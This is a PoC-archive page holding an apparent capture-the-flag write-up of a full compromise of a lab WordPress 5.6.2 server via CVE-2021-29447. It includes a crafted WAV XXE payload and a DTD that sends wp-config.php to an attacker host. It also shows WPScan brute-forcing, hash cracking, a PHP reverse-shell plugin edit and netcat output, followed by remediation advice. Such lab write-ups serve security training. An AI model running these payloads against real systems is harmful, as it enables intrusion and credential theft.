关联漏洞
标题:
WordPress 代码问题漏洞
(CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
描述
The objective is to conduct a full-scale security assessment of a WordPress-based web application, culminating in a complete server compromise. The assessment will focus on exploiting a specific, real-world vulnerability (CVE-2021-29447) to achieve initial access.
介绍
Project Goal: To demonstrate a complete attack chain on a vulnerable WordPress installation, exploiting CVE-2021-29447 (XXE in media library) to achieve remote code execution and full system compromise.
Phase 1: Reconnaissance & Enumeration
Network Scanning with Nmap:
bash
Quick SYN scan to discover open ports
nmap -sS -T4 10.201.3.95
Detailed version and script scanning
nmap -sV -sC -p22,80,3306 10.201.3.95 -oA initial_scan
Results:
text
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu
80/tcp open http Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.6.2
3306/tcp open mysql MySQL 5.7.33
WordPress Enumeration with WPScan:
bash
User enumeration
wpscan --url http://10.201.3.95/ --enumerate u
Password brute-force attack
wpscan --url http://10.201.3.95/ --usernames test-corp --passwords passwords.txt
Credentials Obtained:
Username: test-corp | Password: test
Username: corp-001 | Password: teddybear (cracked later)
Phase 2: Initial Access - XXE Exploitation (CVE-2021-29447)
Malicious WAV File Creation:
bash
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.201.27.80:8000/yup.dtd'"'"'>%remote;%param;%send;]>\x00' > payload.wav
External DTD Payload (yup.dtd):
xml
<!ENTITY % payload SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % param "<!ENTITY % send SYSTEM 'http://10.201.27.80:8000/?exfil=%payload;'>">
HTTP Server for Data Exfiltration:
bash
python3 -m http.server 8000
Data Decoding PHP Script:
php
<?php
$base64 = "hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X";
echo zlib_decode(base64_decode($base64));
?>
Database Credentials Extracted:
php
define('DB_NAME', 'wordpressdb2');
define('DB_USER', 'thedarktangent');
define('DB_PASSWORD', 'sUp3rS3cret132');
define('DB_HOST', 'localhost');
Phase 3: Database Access & Credential Harvesting
MySQL Connection:
bash
mysql -h 10.201.3.95 -u thedarktangent -p
SQL Queries Executed:
sql
SHOW DATABASES;
USE wordpressdb2;
SHOW TABLES;
SELECT user_login, user_pass FROM wptry_users;
User Hashes Obtained:
text
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| corp-001 | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 |
| test-corp | $P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0 |
+------------+------------------------------------+
Password Cracking with John the Ripper:
bash
Create hash file
cat > wp_hashes.txt << EOF
corp-001:\$P\$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
test-corp:\$P\$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0
EOF
Crack hashes
john --wordlist=/usr/share/wordlists/rockyou.txt wp_hashes.txt
john --show wp_hashes.txt
Cracked Passwords:
corp-001:teddybear
test-corp:test
Phase 4: Privilege Escalation & RCE
Reverse Shell Payload (Modified Hello Dolly Plugin):
php
<?php
// PHP Reverse Shell payload
set_time_limit(0);
$VERSION = "1.0";
$ip = '10.201.27.80';
$port = 4444;
$chunk_size = 1400;
$shell = 'uname -a; w; id; /bin/sh -i';
// ... full reverse shell code ...
?>
Netcat Listener:
bash
nc -nvlp 4444
Shell Access Obtained:
text
Connection received on 10.201.3.95 42314
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Phase 5: Post-Exploitation (Pending Completion)
Commands for Next Session:
bash
Flag hunting
find / -name flag.txt 2>/dev/null
find / -name root.txt 2>/dev/null
find / -name user.txt 2>/dev/null
Privilege escalation enumeration
sudo -l
find / -perm -u=s -type f 2>/dev/null
cat /etc/crontab
ps aux
uname -a
cat /etc/os-release
Security Findings & Recommendations
Critical Vulnerabilities Identified:
CVE-2021-29447 - XML External Entity processing in WordPress Media Library
Weak Password Policy - Easily guessable passwords (test, teddybear)
Exposed Database Service - MySQL accessible remotely
Outdated Software - WordPress 5.6.2 with known vulnerabilities
Excessive User Privileges - Non-admin users with plugin modification rights
Remediation Recommendations:
Immediate update to latest WordPress version
Implement strong password policy and 2FA
Restrict database access to localhost only
Regular security patching and vulnerability scanning
Principle of least privilege for user accounts
Project Status: 90% Complete - Reverse shell obtained, final flag capture and privilege escalation pending new IP assignment.
PART 2 ! FLAG
Final Phase: Post-Exploitation & Flag Capture
Objective: Achieve full system compromise and capture the final flag.
Actions Performed:
Reverse Shell Activation:
Edited the hello.php plugin file in the WordPress admin panel (/wp-admin/plugin-editor.php)
Inserted a PHP reverse shell payload configured to connect back to our Kali machine (10.201.6.187:4444)
Executed the payload by accessing: http://ip-10-201-46-113.ec2.internal/wp-content/plugins/hello.php
Successful Shell Access:
Obtained a reverse shell connection as user www-data
Shell output:
text
Connection received on 10.201.46.113 46240
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP
uid=33(www-data) gid=33(www-data) groups=33(www-data)
File System Exploration:
Discovered user directory: /home/stux/
Found flag directory: /home/stux/flag/
Located the flag file: /home/stux/flag/flag.txt
Flag Extraction:
Command executed: cat /home/stux/flag/flag.txt
Flag captured: thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c}
Complete Attack Chain Summary
Phase Technique Used Result
1. Reconnaissance Nmap scanning Discovered WordPress 5.6.2 on Apache/2.4.18
2. Initial Access WPScan + Password brute-forcing Gained admin access with test-corp:test
3. Vulnerability Exploitation CVE-2021-29447 (XXE) Extracted wp-config.php via malicious WAV file
4. Data Exfiltration MySQL credential harvesting Obtained DB credentials: thedarktangent:sUp3rS3cret132
5. Privilege Escalation WordPress admin functionality Edited plugin to gain reverse shell access
6. Final Compromise System exploration Captured final flag in /home/stux/flag/flag.txt
Key Security Findings
Critical Vulnerabilities Exploited:
CVE-2021-29447 - XML External Entity processing in WordPress Media Library
Weak Password Policy - Easily guessable passwords (test, teddybear)
Excessive User Privileges - Non-admin users able to modify plugins
Outdated Software - WordPress 5.6.2 with known vulnerabilities
Information Exposure - Database credentials in wp-config.php
Security Recommendations:
✅ Immediate update to latest WordPress version
✅ Implement strong password policy with 2FA
✅ Regular security patching and vulnerability scanning
✅ Principle of least privilege for user accounts
✅ Restrict file upload functionality and XML processing
Conclusion
Project Chimera successfully demonstrated a complete attack chain from initial reconnaissance to full system compromise. The exercise highlighted how a seemingly minor XML parsing vulnerability (CVE-2021-29447) could be chained with poor security practices to achieve complete system takeover.
The project emphasized the importance of:
Regular software updates and patch management
Strong authentication mechanisms
Proper access control and privilege management
Comprehensive security monitoring
Final Status: ✅ 100% Complete - All objectives achieved, flag captured: thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c}
Project Chimera serves as a powerful reminder that security requires defense in depth, as a single vulnerability can lead to complete system compromise when combined with other security weaknesses.
文件快照
[4.0K] /data/pocs/2e9165afb3f6652226358873a63daf0f6b3094f1
├── [278K] 10.jpeg
├── [183K] 11.jpeg
├── [434K] 12.jpeg
├── [144K] 13.jpeg
├── [130K] 14.jpeg
├── [ 78K] 15.jpeg
├── [ 94K] 16.jpeg
├── [108K] 17.jpeg
├── [120K] 18.jpeg
├── [ 99K] 19.jpeg
├── [197K] 1.jpeg
├── [181K] 20.jpeg
├── [304K] 21.jpeg
├── [165K] 22.jpeg
├── [153K] 23.jpeg
├── [122K] 2.jpeg
├── [204K] 3.jpeg
├── [141K] 4.jpeg
├── [101K] 5.jpeg
├── [137K] 6.jpeg
├── [170K] 7.jpeg
├── [154K] 8.jpeg
├── [136K] 9.jpeg
└── [8.1K] README.md
0 directories, 24 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。